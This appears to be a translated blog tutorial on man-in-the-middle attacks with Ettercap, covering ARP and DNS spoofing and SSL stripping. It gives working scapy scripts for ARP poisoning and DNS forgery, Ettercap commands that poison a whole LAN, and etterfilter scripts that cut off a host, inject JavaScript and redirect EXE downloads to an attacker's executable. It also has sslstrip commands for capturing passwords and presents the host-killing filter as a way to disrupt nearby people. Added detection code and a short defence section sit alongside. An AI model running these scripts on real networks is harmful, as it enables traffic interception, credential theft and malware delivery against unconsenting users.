Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis. PS: that is taken from the Ettercap homepage, so I won't waste more words: it is a seriously powerful tool. In the latest SecTools.Org "Top 125 Network Security Tools" ranking, Ettercap comes in at number 16.





 0x01 ARP spoofing and DNS spoofing


  ARP spoofing: In a TCP/IP network, where an IP packet goes and how it gets there is decided by the routing table, but once the packet reaches the destination network, which machine answers it is decided by the hardware (MAC) address in the Ethernet frame that carries it. Only the machine whose MAC address matches the destination MAC of the frame accepts the packet. Because every host has to send IP packets, every host keeps an IP -> MAC translation table in memory: the ARP cache. The table is normally dynamic (static entries can be added by hand), which means its entries expire after a certain interval, the ARP cache timeout. Before sending an IP packet the host looks up the MAC address for the destination IP in this table; if there is no entry it sends an ARP request as a broadcast, caches the answer, and then sends the packet. Nothing in ARP authenticates that answer: any host on the segment can reply, or send an unsolicited reply, and the requester caches whatever MAC it is told. That is exactly what ARP spoofing (poisoning) exploits. Recommended reading, an article on FB: 中间人攻击-ARP毒化 (Man-in-the-middle attacks: ARP poisoning).
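  Since the cache described above is what gets poisoned, here is the check a defender runs against it, added as an example and not part of the original post: parse an `ip neigh show` style listing and flag the two symptoms an arp:remote attack leaves behind, one MAC claiming several IPs and the gateway's MAC differing from a recorded baseline. The neighbour table, the gateway address 10.0.0.1 and its baseline MAC 00:11:22:33:44:ff are all constructed for the example.

```python
#!/usr/bin/env python3
# Added example: detect ARP cache poisoning from an `ip neigh show` style listing.
# Not part of the original post. The sample neighbour table below is constructed.
import re
from collections import defaultdict

# Constructed sample output of `ip -4 neigh show`; real output has the same shape.
# 10.0.0.20 is the attacker: its MAC now also answers for the gateway 10.0.0.1.
SAMPLE_NEIGH = """\
10.0.0.1 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
10.0.0.12 dev eth0 lladdr 00:11:22:33:44:12 STALE
10.0.0.20 dev eth0 lladdr 00:11:22:33:44:01 REACHABLE
10.0.0.30 dev eth0  FAILED
"""

NEIGH_RE = re.compile(r"^(?P<ip>\S+) dev (?P<dev>\S+) lladdr (?P<mac>[0-9a-f:]{17})", re.I)

def parse_neigh(text):
    """Return {ip: mac} for every resolved entry; unresolved (FAILED) lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line)
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def find_poisoning(table, gateway_ip, known_gateway_mac=None):
    """Two independent signals of ARP poisoning:
    1. one MAC claiming several IPs (arp:remote answers for both gateway and victim)
    2. the gateway's MAC differing from a recorded baseline (static entry, DHCP lease, inventory)
    Returns a list of (kind, detail) findings."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(("shared-mac", f"{mac} claims {sorted(ips)}"))
    gw_mac = table.get(gateway_ip)
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(("gateway-mac-changed",
                         f"{gateway_ip}: expected {known_gateway_mac.lower()}, saw {gw_mac}"))
    return findings

if __name__ == "__main__":
    table = parse_neigh(SAMPLE_NEIGH)
    for kind, detail in find_poisoning(table, "10.0.0.1", "00:11:22:33:44:ff"):
        print(kind, detail)
```

  The shared-MAC signal alone is not proof: a router that owns several addresses, VRRP pairs and proxy-ARP setups legitimately show one MAC for many IPs, so in practice the gateway baseline is the signal to alert on, and a static ARP entry for the gateway is the fix.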

  DNS spoofing: The target's DNS queries reach the attacker (after the ARP attack above, the attacker sits between the victim and its resolver), who forges DNS responses that replace the real IP address with one of his choosing. The victim then connects to that address, where the attacker has prepared a fake site, say a bank's login page, to harvest whatever it wants, such as account numbers and passwords. It is essentially a form of phishing. Note that the real resolver's answer is still on its way, so the forged reply has to arrive first, or the real one has to be dropped. For individual users, defending against DNS hijacking means not clicking unknown links, staying away from dubious sites, not doing online transactions on small sites, and above all remembering the domain name of the site you mean to visit; you can also note down the IP addresses of the sites where you submit sensitive data and type the IP directly when needed (that only counters DNS tampering; an attacker already on the path, as in the ARP case, still sees the traffic). Another recommended FB article: 中间人攻击-DNS欺骗 (Man-in-the-middle attacks: DNS spoofing).

0x02 Man-in-the-middle attack



Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IP/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -b, --broadcast             sniff packets destined to broadcast
  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -S, --nosslmitm             do not forge SSL certificates
  -u, --unoffensive           do not forward packets
  -r, --read <file>           read data from pcapfile <file>
  -f, --pcapfilter <string>   set the pcap filter <string>
  -R, --reversed              use reversed TARGET matching
  -t, --proto <proto>         sniff only this proto (default is all)
      --certificate <file>    certificate file to use for SSL MiTM
      --private-key <file>    private key file to use for SSL MiTM

User Interface Type:
  -T, --text                  use text only GUI
  -q, --quiet                 do not display packet contents
  -s, --script <CMD>          issue these commands to the GUI
  -C, --curses                use curses GUI
  -D, --daemon                daemonize ettercap (no GUI)
  -G, --gtk                   use GTK+ GUI

Logging options:
  -w, --write <file>          write sniffed data to pcapfile <file>
  -L, --log <logfile>         log all the traffic to this <logfile>
  -l, --log-info <logfile>    log only passive infos to this <logfile>
  -m, --log-msg <logfile>     log all the messages to this <logfile>
  -c, --compress              use gzip compression on log files

Visualization options:
  -d, --dns                   resolves ip addresses into hostnames
  -V, --visual <format>       set the visualization format
  -e, --regex <regex>         visualize only packets matching this regex
  -E, --ext-headers           print extended header for every pck
  -Q, --superquiet            do not display user and password

General options:
  -i, --iface <iface>         use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary <ifaces>    list of secondary network interfaces
  -n, --netmask <netmask>     force this <netmask> on iface
  -A, --address <address>     force this local <address> on iface
  -P, --plugin <plugin>       launch this <plugin>
  -F, --filter <file>         load the filter <file> (content filter)
  -z, --silent                do not perform the initial ARP scan
  -j, --load-hosts <file>     load the hosts list from <file>
  -k, --save-hosts <file>     save the hosts list to <file>
  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
  -a, --config <config>       use the alterative config file <config>

Standard options:
  -v, --version               prints the version and exit
  -h, --help


Two typical invocations. -T is text mode, -M arp:remote poisons both sides (the "remote" variant also lets you see traffic the victim sends through the gateway); an empty target field means "any", so "//" matches every host found by the initial ARP scan:

ettercap -i eth0 -T -M arp:remote // //            # spoof every host on the LAN
ettercap -i eth0 -T -M arp:remote /10.0.0.12/ //   # spoof only the host 10.0.0.12 (against all other hosts, the gateway included)
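To read the two target arguments above precisely, here is an added matcher for the MAC/IP/PORTs format from the usage text. It is example code, not ettercap's own: it follows the IPv4 grammar of the man page (comma lists and '-' ranges per octet, ';' between address groups, an empty field meaning any), and `is_selected` models the symmetric TARGET1/TARGET2 selection together with -R reversed matching. Every MAC, address and port used in it is constructed.

```python
#!/usr/bin/env python3
# Added example (not ettercap code): parse and match ettercap-style
# TARGET specs "MAC/IPs/PORTs". Empty field = any. IPv4 only.
import itertools

def _expand_octet(spec):
    """'1-3,10' -> [1, 2, 3, 10]"""
    out = []
    for part in spec.split(','):
        if '-' in part:
            lo, hi = part.split('-', 1)
            out.extend(range(int(lo), int(hi) + 1))
        else:
            out.append(int(part))
    if any(v < 0 or v > 255 for v in out):
        raise ValueError("octet out of range in " + spec)
    return out

def expand_ips(spec):
    """'10.0.0.1-3;10.0.1.5' -> {'10.0.0.1', '10.0.0.2', '10.0.0.3', '10.0.1.5'}
    '' -> None, meaning any address."""
    if spec == '':
        return None
    ips = set()
    for group in spec.split(';'):
        octets = group.split('.')
        if len(octets) != 4:
            raise ValueError("bad IPv4 spec " + group)
        for combo in itertools.product(*(_expand_octet(o) for o in octets)):
            ips.add('.'.join(str(v) for v in combo))
    return ips

def expand_ports(spec):
    """'20-22,80' -> {20, 21, 22, 80}; '' -> None (any port)."""
    if spec == '':
        return None
    ports = set()
    for part in spec.split(','):
        if '-' in part:
            lo, hi = part.split('-', 1)
            ports.update(range(int(lo), int(hi) + 1))
        else:
            ports.add(int(part))
    return ports

def parse_target(spec):
    """'MAC/IPs/PORTs' -> dict of match sets (None = wildcard)."""
    fields = spec.split('/')
    if len(fields) != 3:
        raise ValueError("TARGET must be MAC/IPs/PORTs, got " + spec)
    mac, ips, ports = fields
    return {"mac": mac.lower() or None,
            "ips": expand_ips(ips),
            "ports": expand_ports(ports)}

def matches(target, mac, ip, port):
    """Does one endpoint (mac, ip, port) fall inside a parsed target?"""
    return ((target["mac"] is None or target["mac"] == mac.lower()) and
            (target["ips"] is None or ip in target["ips"]) and
            (target["ports"] is None or port in target["ports"]))

def is_selected(t1, t2, src, dst, reversed_match=False):
    """A packet is selected when src matches TARGET1 and dst matches TARGET2,
    or the other way round (the match is symmetric). -R inverts the result."""
    hit = ((matches(t1, *src) and matches(t2, *dst)) or
           (matches(t1, *dst) and matches(t2, *src)))
    return (not hit) if reversed_match else hit

if __name__ == "__main__":
    victim = parse_target("/10.0.0.12/")       # second command on the page
    anyone = parse_target("//")
    client = ("00:11:22:33:44:12", "10.0.0.12", 51000)   # constructed
    gateway = ("00:11:22:33:44:01", "10.0.0.1", 80)      # constructed
    print(is_selected(victim, anyone, client, gateway))  # True
```

Ettercap 0.8 built with IPv6 support adds a fourth field (MAC/IPs/IPv6/PORTs); the three-field form above is the one the page's usage text shows.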



tcpdump -i eth0    # on the attacker: the victim's traffic now passes through this interface





#!/usr/bin/env python3
# arp-poisoning: answer every ARP request seen on the interface with our own MAC
import sys
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 2:
    print(sys.argv[0] + " <iface>")
    sys.exit(0)

def arp_poison_callback(packet):
    # Got ARP request?
    if packet[ARP].op == 1:
        # Ether src and ARP hwsrc default to our own MAC when scapy sends the frame
        answer = Ether(dst=packet[ARP].hwsrc) / ARP()
        answer[ARP].op = "is-at"
        answer[ARP].hwdst = packet[ARP].hwsrc
        answer[ARP].psrc = packet[ARP].pdst   # claim the address that was asked for
        answer[ARP].pdst = packet[ARP].psrc
        print("Fooling " + packet[ARP].psrc + " that " +
              packet[ARP].pdst + " is me")
        sendp(answer, iface=sys.argv[1])

sniff(prn=arp_poison_callback,
      filter="arp",
      iface=sys.argv[1],
      store=0)
#!/usr/bin/env python3
# dns-spoofing
#
# A simple DNS spoofing script.
# It works better together with ARP spoofing,
# and with the local hosts file deleted at the same time.
# The hosts file has one "<ip> <hostname>" pair per line, e.g.:
#   <spoofed-ip> www.google.com
#
import sys
import getopt
import scapy.all as scapy

dev = "eth0"
filter = "udp port 53"
file = None
dns_map = {}

def handle_packet(packet):
    ip = packet.getlayer(scapy.IP)
    udp = packet.getlayer(scapy.UDP)
    dns = packet.getlayer(scapy.DNS)
    if dns is None or dns.qd is None:
        return

    # standard (A record) DNS query
    if dns.qr == 0 and dns.opcode == 0:
        queried_host = dns.qd.qname.decode()[:-1]   # strip the trailing dot
        resolved_ip = None

        if dns_map.get(queried_host):
            resolved_ip = dns_map.get(queried_host)
        elif dns_map.get('*'):
            resolved_ip = dns_map.get('*')

        if resolved_ip:
            dns_answer = scapy.DNSRR(rrname=queried_host + '.',
                                     ttl=330,
                                     type="A",
                                     rclass="IN",
                                     rdata=resolved_ip)
            # swap src/dst so the forged reply appears to come from the resolver;
            # it must reach the client before the resolver's real answer does
            dns_reply = scapy.IP(src=ip.dst, dst=ip.src) / \
                        scapy.UDP(sport=udp.dport, dport=udp.sport) / \
                        scapy.DNS(
                            id=dns.id,
                            qr=1,
                            aa=0,
                            rcode=0,
                            qd=dns.qd,
                            an=dns_answer
                        )
            print("Send %s has %s to %s" % (queried_host, resolved_ip, ip.src))
            scapy.send(dns_reply, iface=dev)

def usage():
    print(sys.argv[0] + ' -f <hosts-file> -i <dev>')
    sys.exit(1)

def parse_host_file(file):
    for line in open(file):
        line = line.rstrip('\n')
        if line:
            (ip, host) = line.split()
            dns_map[host] = ip

try:
    cmd_opts = 'f:i:'
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == '-i':
        dev = opt[1]
    elif opt[0] == '-f':
        file = opt[1]
    else:
        usage()

if file:
    parse_host_file(file)
else:
    usage()

print("Spoofing DNS requests on %s" % dev)
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)







  Of course, the full usage is in the man page: man etterfilter. It documents every function available to filters in detail. Some examples follow:

  (1) Kill a host:

  You're happily watching a video and a couple of idiots behind you are hammering away at LOL, so your video plays like a slideshow. Annoying, right? Tempted to thump them? Fine, I just want to be a quiet, handsome guy, so it's time to kill them instead. The filter script is etter.filter.kill:

if (ip.src == '10.0.0.12') {     # address of the host to cut off; 10.0.0.12 is the target used above
   # send the RST to both source and dest
   kill();
   # don't even forward the packet
   drop();
   msg("HaHa! a 2b (ip: 10.0.0.12) has been killed...\n");
}



  Compile the script with etterfilter first, then load the compiled filter into ettercap with -F (-q is quiet mode, i.e. packet contents are not displayed). Note that kill() only resets TCP connections; the host's UDP traffic, such as the game's, is only stopped by drop(), which is why the filter calls both:




  (2) Replace images in web pages:


if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      # (the server then sends uncompressed HTML that the second rule can search)
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.iyi8.com/uploadfile/2014/0921/20140921113722651.jpg\" ");
   replace("IMG SRC=", "img src=\"http://www.iyi8.com/uploadfile/2014/0921/20140921113722651.jpg\" ");
   msg("Filter Ran.\n");
}

 (3) JavaScript injection:

  My skills are limited, so here I'll just pop an alert :( The script is etter.filter.alert:

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("zapped Accept-Encoding!\n");
    }
}
if (ip.proto == TCP && tcp.src == 80) {
    # search for the tag we are about to replace
    if (search(DATA.data, "<head>")) {
        replace("<head>", "<head><script type=\"text/javascript\">alert('just for a test!');</script>");
        replace("<HEAD>", "<HEAD><script type=\"text/javascript\">alert('just for a test');</script>");
        msg("Filter run!...Exploit code injected ok!\n");
    }
}


 (4) Redirect EXE downloads (the well-known filter from rmccurdy.com; as its comments say, put your own site and executable in it):

# replace rmccurdy with your website
# replace the url with what ever exe you like

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   # one request per connection, so the redirect lands in its own response
   replace("keep-alive", "close");
   replace("Keep-Alive", "close");
}

if (ip.proto == TCP && search(DATA.data, ": application")) {
   # enable for logging: log(DECODED.data, "/tmp/log.log");
   msg("found EXE\n");
   # "Win32" is the first part of the exe example:
   # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
   if (search(DATA.data, "Win32")) {
      msg("doing nothing\n");
   } else {
      # Location is a placeholder: point it at the exe on your own site
      replace("200 OK", "301 Moved Permanently\nLocation: http://<your-site>/<your.exe>\n");
      msg("redirect success\n");
   }
}
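 All four filters share one mechanic, so here is an added Python model of it (example code, not ettercap or etterfilter): each TCP segment is searched and rewritten on its own. That is why the Accept-Encoding zap chooses a same-length replacement, and why a tag split across two segments is simply missed. The HTTP request and response, and the host example.test, are constructed for the example.

```python
#!/usr/bin/env python3
# Added example (not from the original post): a per-segment model of what the
# etterfilter scripts above do, run over constructed HTTP traffic so the
# same-length constraint and the packet-boundary limitation can be seen offline.

ACCEPT_ENCODING = b"Accept-Encoding"
ACCEPT_RUBBISH = b"Accept-Rubbish!"      # same length: 15 bytes
SCRIPT = b'<script type="text/javascript">alert(\'just for a test!\');</script>'

def filter_request(segment):
    """Client -> server: stop the server from compressing, so the reply stays
    searchable. Length is preserved, so TCP sequence numbers still line up."""
    assert len(ACCEPT_ENCODING) == len(ACCEPT_RUBBISH)
    return segment.replace(ACCEPT_ENCODING, ACCEPT_RUBBISH)

def filter_response(segment):
    """Server -> client: inject the alert after <head> if the tag is in this
    segment. Returns (new_segment, hit)."""
    if b"<head>" in segment:
        return segment.replace(b"<head>", b"<head>" + SCRIPT, 1), True
    return segment, False

def delta(before, after):
    """Bytes added or removed. Non-zero means later sequence/ack numbers no
    longer match what the endpoints expect, so the MITM has to rewrite them;
    a same-length replacement sidesteps that entirely."""
    return len(after) - len(before)

# Constructed traffic
REQUEST = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
           b"Accept-Encoding: gzip, deflate\r\nConnection: keep-alive\r\n\r\n")
RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><head><title>x</title></head><body>hi</body></html>")

def run_demo():
    req = filter_request(REQUEST)
    whole, hit_whole = filter_response(RESPONSE)
    # the same page, but with "<he" at the end of one segment and "ad>" at the start of the next
    cut = RESPONSE.index(b"<head>") + 3
    seg1, hit1 = filter_response(RESPONSE[:cut])
    seg2, hit2 = filter_response(RESPONSE[cut:])
    return {
        "encoding_zapped": ACCEPT_ENCODING not in req and delta(REQUEST, req) == 0,
        "injected_whole": hit_whole,
        "injected_split": hit1 or hit2,      # False: per-segment search misses it
        "growth": delta(RESPONSE, whole),    # bytes the stream grew by
    }

if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, v)
```

 The split case is the usual reason a filter "sometimes works": whether the tag sits inside one segment depends on the server's segmentation, not on the filter.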

0x03 SSL password sniffing


With the ARP attack from 0x02 still running, forward the victim's traffic, redirect everything for port 80 to a local port, and let sslstrip listen there. sslstrip talks HTTPS to the real site and hands the victim a plain-HTTP copy, so the credentials pass through in clear:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# sslstrip -l 10000

This only catches sessions that begin over plain HTTP. A victim who types https://, follows a bookmark to the HTTPS site, or whose browser has HSTS cached or preloaded for the site never sends anything to port 80, and the strip fails.
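What sslstrip does to each response, and the client-side HSTS rule that defeats it, as an added example: this is not sslstrip's code and not part of the original post. The sample response, cookie and the host login.example.test are constructed.

```python
#!/usr/bin/env python3
# Added example (not sslstrip's own code): the core rewrite sslstrip performs on
# a plain-HTTP response, plus the HSTS check that makes the downgrade fail.
# All traffic below is constructed; example.test hosts are placeholders.
import re

HTTPS_LINK = re.compile(rb"https://([A-Za-z0-9.-]+)")

def strip_response(headers, body, stripped_hosts):
    """Rewrite https:// links to http:// and record the hosts, so that when the
    victim later asks for http://host/... the proxy knows to fetch it over TLS.
    A 'Location: https://' redirect is downgraded the same way, and the Secure
    flag is removed from cookies so the victim's browser sends them in clear."""
    def swap(m):
        stripped_hosts.add(m.group(1).decode())
        return b"http://" + m.group(1)
    new_headers = []
    for h in headers:
        name, sep, value = h.partition(b":")
        if not sep:                      # status line, not a name/value pair
            new_headers.append(h)
            continue
        if name.lower() == b"set-cookie":
            value = re.sub(rb";\s*secure", b"", value, flags=re.I)
        elif name.lower() == b"location":
            value = HTTPS_LINK.sub(swap, value)
        new_headers.append(name + sep + value)
    return new_headers, HTTPS_LINK.sub(swap, body)

def remember_hsts(headers, host, hsts_cache):
    """Clients only honour Strict-Transport-Security received over HTTPS, so an
    entry exists only if the victim visited the real site earlier, or the host
    is on the browser's preload list."""
    for h in headers:
        name, sep, value = h.partition(b":")
        if sep and name.lower() == b"strict-transport-security" and b"max-age=" in value.lower():
            hsts_cache.add(host)

def browser_allows_plain_http(host, hsts_cache):
    """With a cached HSTS entry the browser upgrades http://host to https itself
    before sending anything, so the stripped link never produces a plaintext
    request for the proxy to see."""
    return host not in hsts_cache

# Constructed sample response from the real site, as the proxy receives it
SAMPLE_HEADERS = [b"HTTP/1.1 200 OK",
                  b"Content-Type: text/html",
                  b"Set-Cookie: session=abc; Secure; HttpOnly"]
SAMPLE_BODY = b'<a href="https://login.example.test/signin">Sign in</a>'

if __name__ == "__main__":
    hosts = set()
    hdrs, body = strip_response(SAMPLE_HEADERS, SAMPLE_BODY, hosts)
    print(body.decode(), hosts)
```

The padlock is the only thing the victim loses; the page otherwise looks normal, which is why HSTS (and preloading it) rather than user vigilance is the practical counter.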

0X04 Common ways to defend against MITM attacks

1. Encrypt confidential information before transmitting it, so that even if a "man in the middle" intercepts it, it is hard to read. Encryption only helps when the other endpoint is authenticated, though: the sslstrip flow in 0x03 works precisely because the client accepts a plain-HTTP session, so certificate validation and HSTS on the client, and static ARP entries for the gateway, are the counters to the attacks on this page.
2. Anomaly detection by device or IP, e.g. a user who has never accessed the system from a given device or IP before.
3. Frequency detection by device or IP, e.g. a single device or IP accessing a large number of user accounts at the same time.
4. Out-of-band authentication: the system places an automatic phone call-back in real time and sends a second PIN to the SMS gateway, which forwards it to the user; the user then sends that PIN back to the SMS gateway to confirm they are the genuine user.

